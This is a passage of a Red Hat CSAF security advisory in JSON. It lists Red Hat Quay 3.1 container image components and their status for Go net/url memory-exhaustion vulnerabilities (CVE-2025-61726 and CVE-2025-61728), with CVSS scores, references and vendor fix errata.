"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x",
"relates_to_product_reference": "Red Hat Quay 3.1"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2025-61728",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:39.965024+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
